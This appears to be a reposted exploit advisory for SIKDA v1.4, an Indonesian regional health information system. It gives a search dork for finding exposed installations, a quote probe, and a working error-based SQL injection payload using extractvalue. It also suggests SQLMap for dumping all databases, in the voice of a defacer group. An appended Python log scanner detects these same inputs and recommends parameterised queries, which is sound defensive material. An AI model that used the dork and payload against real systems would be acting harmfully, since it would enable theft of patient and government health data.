Sistem Informasi Kesehatan Daerah v1.4 (SIKDA) Xpath Injection Vulnerability

2019.06.24
Sn00py (ID)
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Sistem Informasi Kesehatan Daerah v1.4 (SIKDA) Xpath Injection Vulnerability
# Dork: intext:SIKDA Generik - All Rights Reserved
# Date: 24-06-2019
# Exploit Author: ./Sn00py
# Vendor Homepage: https://e-sikda.kemkes.go.id
# Software Link: N/A
# Category: Webapps
# Version: 1.4
# Tested on: Windows 10 Pro
# CVE : N/A
=======================================

[+] Proof Of Concept:
First, check whether the application requires you to log in. If entering the string ' causes a database error, it is vulnerable.

[+] Exploit:
' and extractvalue(0x0a,concat(0x0a,(select database())))-- -

* You can use SQLMap, or work manually with the Xpath Injection technique, to retrieve all databases.

[+] Demo?
No Demo ^^

Happy Injecting~

Greetz: Indonesian Code Party - RSFLT - N45HT - PacmanCorp - AllindonesiaDefacer
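Both the quote probe and the extractvalue() payload described above leave recognisable traces in request logs. The following is an added example, not part of the original advisory or of SIKDA's code, that flags them in logged form values; the log format, the /login path and the username field are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: assumed "timestamp client method path form-data" log format.
SAMPLE_LOG = """\
2019-06-24T09:14:02 192.0.2.10 POST /login username=perawat01
2019-06-24T09:14:40 198.51.100.7 POST /login username=%27
2019-06-24T09:15:03 198.51.100.7 POST /login username=%27+and+extractvalue(0x0a,concat(0x0a,(select+database())))--+-
2019-06-24T09:15:20 198.51.100.7 POST /login username=%27+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,(SELECT+DATABASE())))--+-
2019-06-24T09:16:00 192.0.2.11 POST /login username=o%27brien
"""

# extractvalue() has no business appearing in a login field.
XPATH_CALL = re.compile(r"\bextractvalue\s*\(")


def normalise(value):
    """URL-decode until stable (bounded), collapse whitespace, lowercase."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"\s+", " ", value).strip().lower()


def classify(value):
    """Return a finding label for one form value, or None if it looks benign."""
    v = normalise(value)
    if XPATH_CALL.search(v):
        return "extractvalue-call"
    if v in ("'", '"'):  # bare quote only; names like o'brien are not flagged
        return "quote-probe"
    return None


def scan(log_text):
    """Return (line_no, client, field, label) for every suspicious form value."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parts = line.split(" ", 4)
        if len(parts) != 5:
            continue  # not a request record in the assumed format
        _, client, _, _, body = parts
        for pair in body.split("&"):
            field, _, raw = pair.partition("=")
            label = classify(raw)
            if label:
                findings.append((line_no, client, field, label))
    return findings
```

Detection of this kind is a stopgap: the underlying fix is to bind login input as query parameters and to stop returning database error text to the client.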


Copyright 2019, cxsecurity.com

 
